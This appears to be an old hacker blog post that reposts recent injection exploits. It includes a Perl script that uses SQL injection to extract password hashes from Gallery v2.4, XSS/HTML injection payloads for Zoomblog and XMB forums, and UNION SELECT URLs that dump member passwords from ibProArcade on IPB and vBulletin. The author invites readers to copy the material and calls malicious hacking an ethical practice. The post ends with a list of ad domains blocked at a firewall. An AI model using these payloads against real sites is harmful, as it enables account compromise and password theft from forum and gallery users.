For giggles, I am including all of the SQL/HTML injection exploits that have been discovered in the past day or two.
Gallery v2.4 SQL Injection
#!/bin/env perl
use LWP::Simple;
if(!$ARGV[0] or !$ARGV[1]) {
print "\n== Warning ABDUCTER Behind U ==";
print "\nUsage:\nperl $0 [host+script]\n\nExample:\nperl $0 http://tonioc.free.fr/gallery/ 1\n";
exit(0);
}
$url = "/showGallery.php?galid=-1%20UNION%20SELECT%20id,null,null,passw,null,ni
ck,null,null,null,null,nick,null%20FROM%20users%20WHERE%20id=$ARGV[1]/*" ;
$page = get($ARGV[0].$url) die "[-] Unable to retrieve: $!";
print "[+] Connected to: $ARGV[0]\n";
$page =~ m/<SPAN class="strong"><b>(.*?)<\/b>/ && print "[+] MD5 hash of password is: $1\n";
print "[-] Unable to retrieve hash of password\n" if(!$1);
Zoomblog HTML Injection
Cross Site Scripting HTML Injection in XMBNOTE: according to RBA, this injection bug was fixed even before the issue was reported. HISTORIC: Zoomblog is prone to HTML injection attacks. It is possible for a malicious Zoomblog user to inject hostile HTML and script code into the commentary via form fields. This code may be rendered in the browser of a web user who views the commentary of Zoomblog. Zoomblog does not adequately filter HTML tags from various fields. This may enable an attacker to inject arbitrary script code into pages that are generated by the Zoomblog.
All versions are vulnerable.
EXPLOIT #!:
Write <script>alert('test')</script> in http://blog.zoomblog/comments/
EXPOIT #2:
<img src='javascript:void(0);' alt='' height=888888 width=888885 border=0>For a how-to on Javascript Injection, visit Javascript Injection in this blog.
This is Xss in the old versions and html injection in the new versions of xmb forums ..injected file: u2u.php
Example is:
u2u.php?action=send&username=Html Injection OR XSS
SQL injection in ibProArcade.
It was tested and found perfectly working under vBulettin or Invision power board.
Date:2005-11-5
The injection is here:
module=report&user=[userid]
Query: 'SELECT name FROM ibf_members WHERE id=[userid]'
Exploit IPB:
index.php?act=Arcade&module=report&user=-1 union select password from ibf_members where id=[any_user]
Exploit vBulettin forums:
index.php?act=ibProArcade&module=report&user=-1 union select password from user where userid=[any_user]
And there you have it. All of the SQL/HTML/JAVASCRIPT injections found today.
If the human body was never exposed to ailments, it would be impressivly vulnerable to the slightest cold. If our country was never exposed to hacking, it would be oppressivly vulnerable to cyber terrorism. With out the creation of a malicious hacking, Afganistan could have destroyed America's economy with a ping flood. This is why I encourange maclicious hacking, as an ethical practice. Without strengthening our defenses, we are weak. This site is focused on security through knowledge. I detest the fact that so many companies are being exploited because malicious hackers know their security holes before they do. For that reason, I hope to educate where the exploits lay. This isn't a 100% information base, as I only publish things I have been able to implement on myself. No credit is needed anywhere . However if you are a publisher, I would appriciate credit. I am an advocate of open source, so copy and paste and call it your own if you like. If my work is good enough for you to plagerize then that is my biggest compliment . If my work is good enough, I will be approached and asked to write more ... this is natural selection of the digital age .
Previous hacks
Previous Hacks
This link kills spam
spam IP addresses
These are sites I block at my firewall.
cdn2.gms1.net
gms1.net
servedby.advertising.com
advertising.com
a.tribalfusion.com
tribalfusion.com
pimpslord.com
altfarm.mediaplex.com
mediaplex.com
ad.yeildmanager.com
yeildmanager.com
doubleclick.net
isg32.casalemedia.com
casalemedia.com
Two very recommended books:
. . The only hacking forum I have found worth mentioning here